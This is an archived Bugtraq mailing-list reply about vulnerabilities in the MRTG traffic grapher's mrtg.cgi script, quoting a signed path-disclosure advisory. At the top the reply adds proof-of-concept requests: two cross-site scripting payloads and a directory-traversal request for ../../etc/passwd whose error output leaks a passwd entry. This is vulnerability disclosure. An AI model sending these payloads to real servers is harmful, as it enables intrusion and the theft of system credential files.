Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Mrtg Path Disclosure Vulnerability
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 04 Feb 2002 21:09:18 +0100

/mrtg.cgi?log=<script>alert('CSS')</script>

/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>

/mrtg.cgi?cfg=../../etc/passwd :

------------------- mrtg.cgi error ------------------------

Software error:
ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or above. Check doc/reference.txt for Help

------------------- mrtg.cgi error ------------------------


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mrtg Path Disclosure Vulnerability

Type:
Input Validation Error

Release Date:
February 4, 2002

Product / Vendor:
The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
traffic load on network-links. Mrtg generates html pages containing
gif images which provide a live visual representation of this
traffic.

http://www.mrtg.org

Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg cgi
script.

http://host/mrtg.cgi?cfg=blabla

Tested:
Mrtg v2.090011
Mrtg v2.090006

Vulnerable:
Mrtg v2.090011
Mrtg v2.090006

And may be other.

Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.

Author:
Tamer Sahin
ts () securityoffice net
http://www.securityoffice.net

Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
Tbl6HDhKVnFPEy1DSB3/q3AH
=+kUc
-----END PGP SIGNATURE-----








_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]